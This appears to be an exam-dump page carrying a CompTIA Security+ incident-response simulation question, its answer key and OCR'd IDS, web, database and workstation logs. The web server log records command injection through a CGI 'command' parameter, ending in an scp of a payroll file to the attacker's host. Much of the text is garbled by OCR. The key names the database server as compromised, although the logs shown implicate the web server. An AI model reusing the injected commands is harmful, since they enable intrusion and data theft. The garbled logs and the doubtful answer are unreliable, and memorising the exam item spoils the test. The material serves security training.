Question 243 of 730 from exam SY0-601: CompTIA Security+

Question 243 of 730 from exam SY0-601: CompTIA Security+

Prev Question Next Question

Question

SIMULATION - A security administrator discovers that an attack has been completed against a node on the corporate network.

All available logs were collected and stored.

You must review all network logs to discover the scope of the attack, check the box of the node(s) that have been compromised and drag and drop the appropriate actions to complete the incident response on the network.

The environment is a critical production environment; perform the LEAST disruptive actions on the network, while still performing the appropriate incid3nt responses.

Instructions: The web server, database server, IDS, and User PC are clickable.

Check the box of the node(s) that have been compromised and drag and drop the appropriate actions to complete the incident response on the network.

Not all actions may be used, and order is not important.

If at any time you would like to bring back the initial state of the simulation, please select the Reset button.

When you have completed the simulation, please select the Done button to submit.

Once the simulation is submitted, please select the Next button to continue.

Forensics Diagram

Instructions: If at any time you would like to bring back the initial state of the simulation, please select the
Reset button. When you have completed the simulation, please select the Done button to submit.

ES

Hacker

Users PC
172:30.0.1

tal
&

Printer
9172.40.05

wee pptcaton (Database
server Steer” O8ener
feroio1 foro ors saab 10.12

Explanations

See the solution below.

Database server was attacked, actions should be to capture network traffic and Chain of Custody.

structions: tee off you woud tke
frsirudtions: fat. ime you would like to bring back the initial state of the simulation, please select the
to sul

ut

| Reset button. When you have completed the simulation, please

tomer

ORs
Possible Actions:

Capture Network Traffic

Chain Of Custody
Format

Hash

Iniage

Record Time Offset

System Restore

Actions Performe:

(Capture Network Traffic

Chain Of Custody

IDS Server Log:

IDS Packet Capture
No. Time Source Destination Protocol Length Info

Cisco_87:85:04 Spanning-tree-(for-bridges) 00 STP 60 —_Conf. Root = 32768/100/00:1c:0e:87
78:00 Cost=4 Port = 0x8004

2.006303 Cisco_87:85:04 Spanning-ree-(for-bridges) 00 STP 60 Conf. Root =32768/10000:1c.0e87:78.00
Cost=4 Port= 0x8004

4.009585 172311461232 17231.146.123.1 ICMP 118 Echo (ping) request id=0x0001, seq=
11256, t=255

6.014086 172311461231 172.31.146.123.2 Echo (ping) reply id=0x0001, seq=
1256, t=255,

7.91131 123.123.123.123 10.10.10.10 GET /egi-bininewcount?command=!s
HTTPI1.1

8.00312 10.10.1010 123.123.123.123 HTTP/1.1 200 OK (textintmi)

7.91131 123.123.123.123 1010.10.10 GET /egi-bininewcount?command=
whoami HTTP/1.1

8.00312 1010.10.10 123.123.123.123 HTTP/1.1 200 OK (textintmi)

9 10.1232 123.123.123.123 10.10.1010 GET /eg-bininewcount?command=s%

20 8 Ntatafirncaincn nell ve LIFTON 4

<i .

Web Server Log:

Saar erence reruns mem rte nay

“"FAST-WebCrawler/2.1-pre2 (ashen@company net)"

123.123.123.123 - - [26/Apr/2010:00:22:49 -0400) "GET /pics/Sstar2000 gif HTTP/1.0" 200 4005
“ntip:/iwww.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)"

fcrawler.company.com - - [26/Apr/2010:00:22:50 -0400} "GET /news/news.html HTTP/1.0" 200 16716 ""
"FAST-WebCrawler/2.1-pre2 (ashen@company net)"

123.123.123.123 - - [26/Apr/2010:00:22:50 -0400] "GET /pics/Sstar.gif HTTP/1.0" 200 1031
“nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)"

123.123.123.123 - - [26/Apr/2010:00:22:51 -0400] "GET /pics/a2hlogo jpg HTTP/1.0" 200 4282
“nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)"

123.123.123.123 - - [26/Apr/2010:00:22:51 -0400) "GET /cgi-bin/newcount?command=null&jafsof3awidth=4&font=
digital&noshow HTTP/1.0" 200 36 "http:/www.comptia.com/asctortf/" "Mozilia/4.05 (Macintosh; I; PPC)"

‘ppp931.on.company.com - - [26/Apr/2010:00:22:52 -0400] "GET /download/windows/asctab31.zip HTTP/1.0" 200 1540096
“nttp:/www..company.com/downloads/freeware/iwebdevelopment/15.htm!" "Mozilia/4.7 [en]C-SYMPA (Win95; U)"

123.123.123.123 - - [26/Apr/2010:00:22:53 -0400] "GET /cgi-bin/newcount?command=Is HTTP/1.0" 200 36
“nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)"

123.123.123.123 - - [26/Apr/2010:00:22'58 -0400] "GET /cgi-bin/newcount?command=whoami HTTP/1.0" 200 36
“nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)"

151.44.15.252 - - [26/Apr/2010:00:22:58 -0400] "GET /cgi-bin/forum/commentary.pl/noframes/read/209 HTTP/1.1" 200
6863 "htip://search.virgilio.it/search/cgi/search.cgi" "Mozilia/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)"

[26//

%20-I%20/datalfinance/payroll/ ~

123.123.123.123

F/2010:00:22:58 -0400] "GET /cgi-bin/newcount?commar
5 Actions

151.44.15.252 - - [26/Apr/2010:00:22:58 -0400] "GET /cgi-bin/forum/commentary.plnoframes/read/209 HTTP/1.1"200
6863 "htip://search.virgilio.it/search/cgi/search.cgi" "Mozilia/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)"

123.123.123.123 - - [26/Apr/2010:00:22:58 -0400] "GET /cgi-bin/newcount?command=Is%20-1%20/data/finance/payroll/
*xls HTTP/1.0" 200 36 "http:/www.comptia.com/asctortt” "Mozilla/4.05 (Macintosh; |; PPC)"

123.123.123.123 - - [26/Apr/2010:00:23:00 -0400) "GET /cgi-bin/newcount?command=scp%20/data/finance/payroll/
GLNov2010xis%20ro0t@ 123.123.123.123: HTTP/1.0" 200 36 "httpyww.complia com/asctorti" "Mozila/4.05 (Macintosh; I; PPC)"

213,60.233.243 - - [25/May/2010:00:17:09 +1200] "GET /internet/index. html HTTP/1.1" 200 6792
“nttpywww company comWideo‘streaming/http himt" "Mozila/5.0 (X11; U; Linux i686; es-ES; 1v-1.6) Gecko/20040413 Debian/1.6-5"

151.44.15.252 - - [25/May/2010:00:17:21 +1200] "GET /js/master.js HTTP/1.1" 200 2263 "nttp://www.company.com/
cgi-bin/forum/commentary.plnoframes/read/209" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)"

151.44,15,252 -- [25/May/2010:00:17:21 +1200] "GET /ess/master.css HTTP/1.1" 200 6123 "http://www. company.com!
¢gi-bin/forum/commentary.pl/noframes/read/209" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)"

11.44.15.252 -- 25/May/2010:00:17-21 +1200] "GET /magesmnavigatior/home' git HTTP/.1" 200 2736 "np /waw.company com
/cgi-binforum/commentary p/noframes/read/209" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)"

191.44.15.252-- [25/May/2010:00-17:21 +1200] "GET Idata‘zookeeperico-100 gif HTTPI1.1" 200 196 “http zwww.company.com/
egibin/forum/commentary.p/noframes/read/209" "Mazilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)"

181.44.15.252-- [26¥May/2010:00-17:22 +1200] "GET /adsense-alternate him! HTTP/1.1" 200 887 “nitp:/Aww. company.com
cgibin/forum/commentary plinoframes/read/209" "Mazilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)"

151.44.15.252-- [25!May/2010.00:17:39 +1200] "GET Idata/zookeeper/status him! HTTP/'1.1" 200 4195 "http/ww.company.com/
‘egibirvforuvcomm

oi) ,

Database Server Log:

Database Server Log

Audit Failure

Audit Success

Audit Success

Audit Success

Audit Success

Audit Success

Audit Failure

Audit Success

Audit Success

2012/4/16 11:33

2012/4/16 11:35

2012/4/16 11:35

2012/4/16 11:35

2012/4/16 11:35

2012/4/16 11:35

2012/4/16 11:35

2012/4/16 11:35

2012/4/16 11:35

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Microsoft Windows security auditing,

Logon

‘Special Logon

Logon

Logon

Logon

‘Sensitive Privilege Use

Sensitive Privilege Use

Logon

Special Logon

Users PC Log:

User PC Log

WORKSTATION A
IP ADDRESS: 172:30.0.10
NETMASK: 255.255.255.0

GATEWAY 172:30.0.1